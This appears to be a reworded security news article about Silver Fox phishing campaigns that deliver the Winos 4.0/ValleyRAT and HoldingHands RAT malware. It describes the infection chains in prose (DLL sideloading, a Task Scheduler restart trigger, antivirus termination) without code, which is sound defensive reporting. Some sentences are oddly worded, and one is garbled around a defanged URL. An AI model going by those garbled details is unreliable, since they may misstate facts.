The attackers behind the malware family known as Winos 4.0 (aka ValleyRAT) have expanded their targeting from China and Taiwan to Japan and Malaysia using another remote access Trojan (RAT) tracked as HoldingHands RAT (aka Gh0stBins).
“This campaign relied on phishing emails containing PDFs with embedded malicious links,” Pei Han Liao, a researcher at Fortinet’s FortiGuard Labs, said in a report shared with The Hacker News. “These files purported to be official Treasury Department documents and contained numerous links beyond the one distributing Winos 4.0.”
Winos 4.0 is a family of malware that is often spread through phishing and search engine optimization (SEO) poisoning, redirecting unsuspecting users to fake websites disguised as popular software such as Google Chrome, Telegram, Youdao, Sogou AI, WPS Office, and DeepSeek.
The use of Winos 4.0 is primarily associated with an “aggressive” Chinese cybercrime group known as Silver Fox. This group is also tracked as SwimSnake, The Great Thief of Valley (or Valley Thief), UTG-Q-1000, and Void Arachne.
Last month, Check Point believed the attackers exploited a previously unknown vulnerable driver associated with WatchDog Anti-malware as part of a Bring Your Own Vulnerable Driver (BYOVD) attack aimed at disabling security software installed on compromised hosts.
A few weeks later, Fortinet highlighted another campaign in August 2025 that leveraged SEO poisoning to distribute modules related to HiddenGh0st and Winos malware.
Silver Fox’s targeting of Taiwan and Japan with the HoldingHands RAT was documented in June by a cybersecurity firm and a security researcher named somedieyoungZZ, in which the attackers used a phishing email containing a booby-trapped PDF document to activate a multi-stage infection that ultimately deployed the Trojan.
It’s worth noting at this point that both Winos 4.0 and HoldingHands RAT are inspired by another RAT malware called Gh0st RAT, whose source code was leaked in 2008 and has since been widely adopted by various hacker groups in China.
Fortinet announced that it has identified a PDF document purporting to be a Taiwanese draft tax regulation that contains a URL to a Japanese web page (“twsww”).[.]Thin/Download[.]html”), the victim is asked to download a ZIP archive that delivers the HoldingHands RAT.
Further investigation revealed an attack targeting China using a tax-themed Microsoft Excel document as a lure to distribute Winos. Some of them date back to March 2024. However, recent phishing campaigns have shifted their focus to Malaysia and used fake landing pages to trick recipients into downloading the HoldingHands RAT.
The starting point is an executable file that claims to be an excise audit document. This is used to sideload malicious DLLs. This DLL acts as a shellcode loader for ‘sw.dat’. The payload is designed to perform anti-virtual machine (VM) checks, enumerate active processes against a list of Avast, Norton, and Kaspersky security products and terminate them if found, elevating privileges, and terminating Task Scheduler.
It will also drop some other files into the C:\Windows\System32 folder on your system.
svchost.ini contains the relative virtual address (RVA) for the VirtualAlloc function. TimeBrokerClient.dll, the official TimeBrokerClient.dll has been renamed to BrokerClientCallback.dll. msvchost.dat: Contains encrypted shellcode system.dat: Contains encrypted payload wkscli.dll (unused DLL)
“Task Scheduler is a Windows service hosted by svchost.exe that allows users to control when certain operations and processes run,” Fortinet said. “Task Scheduler recovery settings are configured by default to restart a service one minute after it fails.”
“When Task Scheduler is restarted, svchost.exe runs and loads the malicious TimeBrokerClient.dll. This trigger mechanism does not require launching the process directly, making behavior-based detection more difficult.”
The main function of “TimeBrokerClient.dll” is to allocate memory for the encrypted shellcode in “msvchost.dat” by calling the VirtualAlloc() function using the RVA value specified in “svchost.ini”. In the next stage, ‘msvchost.dat’ decrypts the payload stored in ‘system.dat’ and retrieves the HoldingHands payload.
HoldingHands has the ability to connect to a remote server, send host information to the remote server, send a heartbeat signal every 60 seconds to maintain the connection, and receive and process commands issued by the attacker on the infected system. These commands allow the malware to obtain sensitive information, execute arbitrary commands, and download additional payloads.
The new feature addition is a new command that allows you to update the command and control (C2) address used for communication through Windows registry entries.
Operation Silk Lure targeting China with ValleyRAT
The development comes as Seqrite Labs reveals details of an ongoing email-based phishing campaign leveraging C2 infrastructure hosted in the United States, targeting Chinese companies in the fintech, cryptocurrency, and trading platform space to ultimately deliver Winos 4.0. The operation was code-named “Operation Silk Lure” because of its China-related activities.
Researchers Dixit Panchal, Somen Birma and Kartik Jivani said: “Threatening attackers are creating highly targeted emails masquerading as job seekers and sending them to human resources and technical recruitment teams within Chinese companies.”
“These emails often contain malicious .LNK (Windows shortcut) files embedded in seemingly legitimate resumes or portfolio documents. Once executed, these .LNK files act as droppers and begin executing the payload that facilitates the initial compromise.”
Once launched, the LNK file executes PowerShell code to download a decoy PDF resume while secretly dropping three additional payloads into the “C:\Users\\AppData\Roaming\Security” location for execution. PDF resumes are localized and tailored to Chinese targets to increase the chances of a successful social engineering attack.
The dropped payload is:
CreateHiddenTask.vbs – Creates a scheduled task to launch “keytool.exe” every day at 8am keytool.exe – Loads jli.dll using DLL sideloading jli.dll – Malicious DLL that launches Winos 4.0 malware encrypted and embedded within keytool.exe
“The deployed malware establishes persistence within the compromised system and launches various reconnaissance activities,” the researchers said. “This includes capturing screenshots, collecting clipboard contents, and extracting critical system metadata.”
The Trojan horse also incorporates various techniques to evade detection, including attempting to uninstall detected antivirus products and terminating network connections associated with security programs such as Kingsoft Antivirus, Huorong, and 360 Total Security to disrupt their normal functioning.
“This leaked information significantly increases the risk of advanced cyber espionage, identity theft, and credential compromise, thereby posing serious threats to both organizational infrastructure and individual privacy,” the researchers added.
Source link
